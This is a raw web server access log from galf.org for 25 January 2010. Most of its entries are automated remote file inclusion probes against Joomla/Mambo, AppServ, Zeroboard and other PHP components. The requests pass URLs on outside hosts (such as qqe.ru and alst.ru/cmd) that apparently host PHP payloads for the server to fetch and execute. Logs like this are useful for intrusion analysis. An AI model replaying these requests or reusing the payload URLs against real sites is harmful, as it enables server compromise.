118.107.166.92 - - [25/Jan/2010:03:44:22 -0800] "GET /logs/access_100118.log%20%20//write_update.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:45:34 -0800] "GET /components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:45:35 -0800] "GET /logs//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:45:35 -0800] "GET /logs/access_090907.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:45:49 -0800] "GET /logs/access_100111.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:45:55 -0800] "GET /logs/access_091214.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:45:55 -0800] "GET /logs/access_090921.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:46:01 -0800] "GET /logs/access_090706.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:46:18 -0800] "GET /logs/access_090727.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:46:29 -0800] "GET /logs/access_091102.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:46:29 -0800] "GET /logs/access_090914.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:46:29 -0800] "GET /logs/access_090831.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:46:37 -0800] "GET /logs/access.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:46:37 -0800] "GET /logs/access_091221.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:46:49 -0800] "GET /logs/access_091228.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:46:49 -0800] "GET /logs/access_090713.log%20%20//components/com_performs/performs.php?mosConfig.absolute.path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:55:45 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [25/Jan/2010:03:55:45 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [25/Jan/2010:03:55:46 -0800] "GET /logs/access.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
211.232.85.247 - - [25/Jan/2010:03:55:54 -0800] "GET /logs/access_091123.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:55:54 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:55:54 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.232.85.247 - - [25/Jan/2010:03:56:24 -0800] "GET /logs/access_090824.log%20%20//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://qqe.ru//forum/avatars/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.94.155.122 - - [25/Jan/2010:03:56:57 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.94.155.122 - - [25/Jan/2010:03:56:57 -0800] "GET /appserv/main.php?appserv_root=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.94.155.122 - - [25/Jan/2010:03:56:57 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.94.155.122 - - [25/Jan/2010:04:02:44 -0800] "GET /logs/appserv/main.php?appserv_root=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.94.155.122 - - [25/Jan/2010:04:02:44 -0800] "GET /appserv/main.php?appserv_root=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.94.155.122 - - [25/Jan/2010:04:02:44 -0800] "GET /logs/access.log/appserv/main.php?appserv_root=http://www.focusi.net/bbs/data/board_free/satu.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:04:10:38 -0800] "GET /delete_all.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:04:10:38 -0800] "GET /logs//delete_all.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:04:10:38 -0800] "GET /logs/access.log%20%20//delete_all.php?board_skin_path=http://nic.bupt.edu.cn/media/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:04:10:54 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
118.107.166.92 - - [25/Jan/2010:04:10:54 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.olir.it/areetematiche/67/ahhe.txt?? HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:04:16:33 -0800] "GET /logs/access.log%20%20/?sourcedir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [25/Jan/2010:04:16:34 -0800] "GET /?sourcedir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
203.237.238.234 - - [25/Jan/2010:04:16:34 -0800] "GET /logs/?sourcedir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "galf.org"
143.248.176.79 - - [25/Jan/2010:04:18:45 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:04:18:45 -0800] "GET /logs/access_090817.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:04:18:45 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:04:20:35 -0800] "GET /logs/access_090921.log/?sourcedir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:04:20:35 -0800] "GET /?sourcedir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:04:20:35 -0800] "GET /logs/?sourcedir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 200 4799 "-" "Mozilla/5.0" "www.galf.org"
203.237.238.234 - - [25/Jan/2010:04:20:39 -0800] "GET /logs/access_090720.log/?sourcedir=http://210.205.6.168/~shop/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.113.224 - - [25/Jan/2010:04:28:06 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
67.195.113.224 - - [25/Jan/2010:04:28:06 -0800] "GET /tmp/?D=D HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
222.232.119.252 - - [25/Jan/2010:04:41:03 -0800] "GET /logs/access_090720.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.kt13.co.kr/images/id1.php?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
222.232.119.252 - - [25/Jan/2010:04:41:03 -0800] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.kt13.co.kr/images/id1.php?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
222.232.119.252 - - [25/Jan/2010:04:41:03 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.kt13.co.kr/images/id1.php?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
222.232.119.252 - - [25/Jan/2010:04:42:05 -0800] "GET /logs/access_091102.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.kt13.co.kr/images/id1.php?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
186.28.232.13 - - [25/Jan/2010:04:44:07 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ma-turkocagi.com/templates/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
186.28.232.13 - - [25/Jan/2010:04:44:07 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ma-turkocagi.com/templates/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
186.28.232.13 - - [25/Jan/2010:04:44:07 -0800] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ma-turkocagi.com/templates/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "galf.org"
200.93.147.154 - - [25/Jan/2010:04:50:06 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:04:50:06 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:04:50:07 -0800] "GET /logs/access_091214.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:04:50:07 -0800] "GET /logs/access_090928.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:04:52:40 -0800] "GET /logs/access_090928.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:04:52:40 -0800] "GET /logs/access_091214.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:04:53:55 -0800] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:04:53:55 -0800] "GET /PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:04:53:55 -0800] "GET /logs/access_090928.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:04:53:56 -0800] "GET /logs/access_091214.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:04:57:29 -0800] "GET /logs//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:04:57:29 -0800] "GET /write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:04:57:29 -0800] "GET /logs/access.log//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:04:58:22 -0800] "GET /logs/access_090928.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [25/Jan/2010:04:58:23 -0800] "GET /logs/access_091214.log%20%20//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.howtolisten.kr//lct/img/254/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:04:58:31 -0800] "GET /logs//ws/login.php?noSet=0&includedir=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:04:58:31 -0800] "GET /ws/login.php?noSet=0&includedir=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:04:58:31 -0800] "GET /logs//ws/login.php?noSet=0&includedir=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:04:58:32 -0800] "GET /ws/login.php?noSet=0&includedir=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
68.178.173.159 - - [25/Jan/2010:05:00:07 -0800] "GET /errors.php?error=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
68.178.173.159 - - [25/Jan/2010:05:00:07 -0800] "GET /logs/errors.php?error=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.galf.org"
68.178.173.159 - - [25/Jan/2010:05:00:07 -0800] "GET /errors.php?error=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
68.178.173.159 - - [25/Jan/2010:05:00:07 -0800] "GET /logs/errors.php?error=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:00:09 -0800] "GET /write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:00:09 -0800] "GET /logs//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:00:09 -0800] "GET /logs/access.log%20%20//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
68.178.173.159 - - [25/Jan/2010:05:00:11 -0800] "GET /errors.php?error=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
68.178.173.159 - - [25/Jan/2010:05:00:11 -0800] "GET /logs/errors.php?error=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.galf.org"
68.178.173.159 - - [25/Jan/2010:05:00:11 -0800] "GET /errors.php?error=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
68.178.173.159 - - [25/Jan/2010:05:00:11 -0800] "GET /logs/errors.php?error=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:05:00:23 -0800] "GET /errors.php?error=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:05:00:23 -0800] "GET /logs/errors.php?error=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 - "-" "Mozilla/3.0 (OS/2; U)" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:05:00:23 -0800] "GET /errors.php?error=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
94.124.120.47 - - [25/Jan/2010:05:00:23 -0800] "GET /logs/errors.php?error=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 - "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:05:00:45 -0800] "GET /logs/access_090817.log/errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:05:00:46 -0800] "GET /errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
200.226.134.29 - - [25/Jan/2010:05:00:46 -0800] "GET /logs/errors.php?error=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:00:54 -0800] "GET /logs/access.log//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:00:54 -0800] "GET /logs//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:00:54 -0800] "GET /write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:36 -0800] "GET /write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:36 -0800] "GET /logs//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:36 -0800] "GET /logs/access.log//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:39 -0800] "GET /logs/access.log%20%20//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:39 -0800] "GET /write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:39 -0800] "GET /logs//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:41 -0800] "GET /logs//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:41 -0800] "GET /write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:41 -0800] "GET /write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:41 -0800] "GET /logs//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:41 -0800] "GET /logs/access.log%20%20//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.16.230.82 - - [25/Jan/2010:05:01:41 -0800] "GET /logs/access.log//write_update.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
143.248.176.79 - - [25/Jan/2010:05:02:23 -0800] "GET /bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.176.79 - - [25/Jan/2010:05:02:23 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
143.248.176.79 - - [25/Jan/2010:05:02:23 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
213.171.37.206 - - [25/Jan/2010:05:05:49 -0800] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [25/Jan/2010:05:05:54 -0800] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
213.171.37.206 - - [25/Jan/2010:05:05:54 -0800] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://hypotheekservice.net/images/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "galf.org"
201.130.79.57 - - [25/Jan/2010:05:06:26 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.130.79.57 - - [25/Jan/2010:05:06:26 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.130.79.57 - - [25/Jan/2010:05:06:26 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.130.79.57 - - [25/Jan/2010:05:06:45 -0800] "GET /logs/access_091116.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//COM/m1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
